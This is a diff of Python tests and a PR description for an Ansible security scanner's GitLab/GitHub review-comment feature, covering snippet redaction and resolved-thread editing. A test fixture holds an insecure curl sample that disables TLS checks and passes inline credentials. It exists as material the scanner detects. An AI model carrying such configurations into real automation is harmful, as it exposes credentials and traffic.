+        assert "force-change-pass=false" in out
+
     def test_preserves_multiline_yaml_context(self):
         """The scanner's ``code_snippet`` for module-level rules is
         often a 3-line view (task header + ``# ...`` ellipsis + the
@@ -1691,7 +1710,7 @@ class TestSnippetRedaction:
 
     def test_truncation_keeps_prefix_and_offending_flag(self):
         """Real-world regression: a long shell task like
-        ``curl -d '<12KB JSON>' -k -u "splunker:..."`` would
+        ``curl -d '<12KB JSON>' -k -u "admin:..."`` would
         previously truncate after the harmless ``curl -d`` prefix
         and lop off the ``-k`` that made the rule fire -- reviewers
         saw a snippet that didn't seem to match the rule's claim.
@@ -1704,7 +1723,7 @@ class TestSnippetRedaction:
         we have to pick what to show.
         """
         long_payload = "x" * 600
-        line = f"curl -d '{long_payload}' -k -u \"splunker:secret\" https://api/x"
+        line = f"curl -d '{long_payload}' -k -u \"admin:secret\" https://api/x"
         out = comment._redact_snippet(line)
         assert "-k" in out, (
             "the trailing ``-k`` flag must remain visible after truncation, "

--- a/tests/test_comment_inline.py
+++ b/tests/test_comment_inline.py
@@ -180,6 +180,33 @@ class TestRenderInlineBody:
         body = comment.inline._render_inline_body(finding, anchored=True)
         assert body.rstrip().endswith("-->")
 
+    def test_location_line_renders_under_header_when_no_link(self):
+        finding = _Finding("rule_a", "HIGH", "roles/web/tasks/main.yml", 42)
+        body = comment.inline._render_inline_body(finding, anchored=True)
+        assert "`roles/web/tasks/main.yml:42`" in body
+        header_idx = body.index("**HIGH**")
+        loc_idx = body.index("roles/web/tasks/main.yml:42")
+        assert header_idx < loc_idx
+        assert "\U0001f4cd" in body
+
+    def test_location_line_uses_markdown_link_when_file_link_provided(self):
+        finding = _Finding("rule_a", "HIGH", "roles/web/tasks/main.yml", 42)
+        link = "https://github.com/owner/repo/blob/abc123/roles/web/tasks/main.yml#L42"
+        body = comment.inline._render_inline_body(finding, anchored=True, file_link=link)
+        assert f"[`roles/web/tasks/main.yml:42`]({link})" in body
+
+    def test_location_line_omitted_when_file_path_missing(self):
+        finding = _Finding("rule_a", "HIGH", "", 0)
+        body = comment.inline._render_inline_body(finding, anchored=True)
+        assert "\U0001f4cd" not in body
+
+    def test_location_line_drops_line_suffix_when_unknown(self):
+        finding = _Finding("rule_a", "HIGH", "roles/web/tasks/main.yml", 0)
+        body = comment.inline._render_inline_body(finding, anchored=True)
+        assert "`roles/web/tasks/main.yml`" in body
+        assert "main.yml:0" not in body
+        assert "main.yml:" not in body
+
 
 class TestSplitFindings:
     def test_no_changed_files_treats_all_as_anchor_candidates(self):
@@ -288,6 +315,230 @@ class TestGitLabInline:
         with patch.object(comment.httpx, "Client", return_value=cm):
             r = comment.post_inline_comments([], ctx)
         assert r.resolved == 1
+
+
+class TestResolvedBodyRendering:
+    def test_replaces_severity_header_with_resolved_line(self):
+        finding = _Finding("commented_out_auth_block", "MEDIUM", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        rewritten = comment.inline._render_resolved_inline_body(original, "abc1234def567890")
+        assert "**RESOLVED**" in rewritten
+        assert "`commented_out_auth_block`" in rewritten
+        assert "`abc1234`" in rewritten
+        assert "**MEDIUM**" not in rewritten
+
+    def test_swaps_disclaimer_for_closed_variant(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        rewritten = comment.inline._render_resolved_inline_body(original, "abc1234")
+        assert "Resolving this thread does not unblock" not in rewritten
+        assert "Closed automatically by the scanner" in rewritten
+
+    def test_drops_inline_breadcrumb(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False, breadcrumb=True)
+        assert "see the summary comment for the policy" in original
+        rewritten = comment.inline._render_resolved_inline_body(original, "abc1234")
+        assert "see the summary comment for the policy" not in rewritten
+
+    def test_preserves_marker_for_dedup(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        rewritten = comment.inline._render_resolved_inline_body(original, "abc1234")
+        assert comment.inline._decode_inline_marker(rewritten) == (
+            comment.inline._finding_fingerprint(finding)
+        )
+
+    def test_embeds_resolved_state_sentinel(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        rewritten = comment.inline._render_resolved_inline_body(original, "abc1234")
+        assert comment.inline._INLINE_RESOLVED_SENTINEL in rewritten
+
+    def test_idempotent_on_already_resolved_body(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        once = comment.inline._render_resolved_inline_body(original, "abc1234")
+        twice = comment.inline._render_resolved_inline_body(once, "abc1234")
+        assert once.count(comment.inline._INLINE_RESOLVED_SENTINEL) == 1
+        assert twice.count(comment.inline._INLINE_RESOLVED_SENTINEL) == 1
+        assert twice.count("**RESOLVED**") == 1
+
+    def test_short_sha_handles_missing_value(self):
+        finding = _Finding("r", "HIGH", "a.yml", 5)
+        original = comment.inline._render_inline_body(finding, anchored=False)
+        rewritten = comment.inline._render_resolved_inline_body(original, "")
+        assert "`unknown`" in rewritten
+
+
+class TestResolvedThreadEdit:
+    """Validate that the bot edits an inline thread's first comment to a
+    clearly-closed body before resolving. Without this the GitLab/GitHub
+    UI shows a stale severity badge next to a green resolved badge,
+    which reads as a contradiction."""
+
+    def test_gitlab_edits_note_then_resolves(self):
+        ctx = _ctx("gitlab")
+        stale_finding = _Finding("commented_out_auth_block", "MEDIUM", "a.yml", 9)
+        original_body = comment.inline._render_inline_body(stale_finding, anchored=False)
+        existing = {
+            "id": "disc-stale",
+            "notes": [{"id": 99, "system": False, "body": original_body}],
+        }
+        # Override commit_sha so the rewritten body cites it.
+        ctx_with_sha = comment.PlatformContext(
+            platform=ctx.platform,
+            api_url=ctx.api_url,
+            project_ref=ctx.project_ref,
+            mr_number=ctx.mr_number,
+            commit_sha="abc1234def567890",
+            token=ctx.token,
+            run_url=ctx.run_url,
+        )
+
+        captured: list[dict[str, Any]] = []
+
+        def _put(url, *, headers=None, json=None):
+            captured.append({"url": url, "json": json})
+            return _resp({"resolved": True})
+
+        cm = _routed_client(
+            get=lambda *a, **k: _resp(
+                [existing]
+                if "/discussions" in (a[0] if a else "")
+                else {"diff_refs": {"base_sha": "B", "start_sha": "S", "head_sha": "H"}}
+            ),
+            put=_put,
+        )
+        with patch.object(comment.httpx, "Client", return_value=cm):
+            r = comment.post_inline_comments([], ctx_with_sha)
+
+        assert r.resolved == 1
+        assert len(captured) == 2, f"expected note-edit + resolve, got {captured}"
+        edit_call, resolve_call = captured
+        assert edit_call["url"].endswith("/discussions/disc-stale/notes/99")
+        assert "**RESOLVED**" in edit_call["json"]["body"]
+        assert "`abc1234`" in edit_call["json"]["body"]
+        assert resolve_call["url"].endswith("/discussions/disc-stale")
+        assert resolve_call["json"] == {"resolved": True}
+
+    def test_gitlab_skips_already_resolved_threads(self):
+        ctx = _ctx("gitlab")
+        stale_finding = _Finding("r", "HIGH", "a.yml", 9)
+        stale_marker = comment.inline._inline_marker(
+            comment.inline._finding_fingerprint(stale_finding)
+        )
+        already_resolved_body = (
+            f"\u2705 **RESOLVED**\n\n{comment.inline._INLINE_RESOLVED_SENTINEL}\n\n{stale_marker}"
+        )
+        existing = {
+            "id": "disc-stale",
+            "notes": [{"id": 99, "system": False, "body": already_resolved_body}],
+        }
+        captured: list[dict[str, Any]] = []
+
+        def _put(url, *, headers=None, json=None):
+            captured.append({"url": url, "json": json})
+            return _resp({"resolved": True})
+
+        cm = _routed_client(
+            get=lambda *a, **k: _resp(
+                [existing]
+                if "/discussions" in (a[0] if a else "")
+                else {"diff_refs": {"base_sha": "B", "start_sha": "S", "head_sha": "H"}}
+            ),
+            put=_put,
+        )
+        with patch.object(comment.httpx, "Client", return_value=cm):
+            r = comment.post_inline_comments([], ctx)
+
+        assert r.resolved == 0
+        assert captured == []
+
+    def test_github_updates_review_comment_then_resolves(self):
+        ctx = _ctx("github")
+        stale_finding = _Finding("commented_out_auth_block", "MEDIUM", "a.yml", 9)
+        original_body = comment.inline._render_inline_body(stale_finding, anchored=True)
+        ctx_with_sha = comment.PlatformContext(
+            platform=ctx.platform,
+            api_url=ctx.api_url,
+            project_ref=ctx.project_ref,
+            mr_number=ctx.mr_number,
+            commit_sha="abc1234def567890",
+            token=ctx.token,
+            run_url=ctx.run_url,
+        )
+        captured: list[dict[str, Any]] = []
+
+        def _post(url, *, headers=None, json=None):
+            q = (json or {}).get("query") or ""
+            captured.append({"query_first_line": q.strip().splitlines()[0], "json": json})
+            if "PRId" in q:
+                return _resp({"data": {"repository": {"pullRequest": {"id": "PR_1"}}}})
+            if "Threads" in q:
+                return _resp(
+                    {
+                        "data": {
+                            "repository": {
+                                "pullRequest": {
+                                    "reviewThreads": {
+                                        "nodes": [
+                                            {
+                                                "id": "T_stale",
+                                                "comments": {
+                                                    "nodes": [
+                                                        {
+                                                            "id": "C_stale",
+                                                            "body": original_body,
+                                                        }
+                                                    ]
+                                                },
+                                            }
+                                        ],
+                                        "pageInfo": {
+                                            "hasNextPage": False,
+                                            "endCursor": None,
+                                        },
+                                    }
+                                }
+                            }
+                        }
+                    }
+                )
+            if "updatePullRequestReviewComment" in q:
+                return _resp(
+                    {
+                        "data": {
+                            "updatePullRequestReviewComment": {
+                                "pullRequestReviewComment": {"id": "C_stale"}
+                            }
+                        }
+                    }
+                )
+            if "resolveReviewThread" in q:
+                return _resp({"data": {"resolveReviewThread": {"thread": {"id": "T_stale"}}}})
+            return _resp({})
+
+        with patch.object(comment.httpx, "Client", return_value=_routed_client(post=_post)):
+            r = comment.post_inline_comments([], ctx_with_sha)
+
+        assert r.resolved == 1
+        update_calls = [
+            c
+            for c in captured
+            if "updatePullRequestReviewComment" in (c["json"] or {}).get("query", "")
+        ]
+        resolve_calls = [
+            c for c in captured if "resolveReviewThread" in (c["json"] or {}).get("query", "")
+        ]
+        assert len(update_calls) == 1
+        assert len(resolve_calls) == 1
+        update_vars = update_calls[0]["json"]["variables"]
+        assert update_vars["id"] == "C_stale"
+        assert "**RESOLVED**" in update_vars["body"]
+        assert "`abc1234`" in update_vars["body"]
+        resolve_vars = resolve_calls[0]["json"]["variables"]
+        assert resolve_vars["threadId"] == "T_stale"
 
 
 class TestGitHubInline:


### PR DESCRIPTION
## Summary

- **src/ansible_security_scanner/comment/inline.py**
  - New _ThreadRecord dataclass unifies thread-id + first-note-id + body for both GitLab and GitHub.
  - New _render_resolved_inline_body rewrites an open-state body to its closed-state form keyed on commit_sha; module-level _INLINE_HEADER_RE backs both the resolve renderer and the rule-id capture.
  - New _render_inline_location renders a file:line line under the header, with a Markdown link when _file_deep_link can build one.
  - New _finding_file_link helper centralises the file_path / line_number coercion so the GitLab and GitHub post_one paths share one source of truth.
  - GitLab resolve loop now PUTs the rewritten body to /discussions/{id}/notes/{note_id} before PUTting the resolved flag.
  - GitHub resolve loop now mutates the comment body via updatePullRequestReviewComment before resolveReviewThread.
  - Both loops skip threads that already carry the _INLINE_RESOLVED_SENTINEL so re-runs are no-ops.

- **src/ansible_security_scanner/comment/rendering.py**
  - _SNIPPET_KV_REDACT_RE adds & as a stop char so URL-encoded form bodies redact each field independently.

- **docs/mr-pr-comments.md, docs/ci-cd.md**
  - GitHub Actions example gains a concurrency: block on pull_request events.
  - GitLab CI example gains resource_group: ansible-security-scan-mr-${CI_MERGE_REQUEST_IID}.
  - New \"Why serialize per-MR / per-PR?\" section explains the failure modes (duplicate top-level comment, contradictory inline thread, ping-pong summary text) and why resource_group is preferred over interruptible.

- **patterns/, remediations/, tests/playbooks/bad_example.yml**
  - Fixture values that looked copied from a real environment are replaced with allowlisted equivalents. No rule logic, regex, or recommendation text changed.

- **tests/test_comment.py, tests/test_comment_inline.py**
  - New TestResolvedBodyRendering and TestResolvedThreadEdit classes cover the resolve-edit flow on both platforms, including idempotency and the skip-on-second-run path.
  - New test_location_line_* cases cover the file:line header (link present/absent, missing path, missing line).
  - New test_redacts_url_encoded_form_body_per_field regression test for the redaction fix.
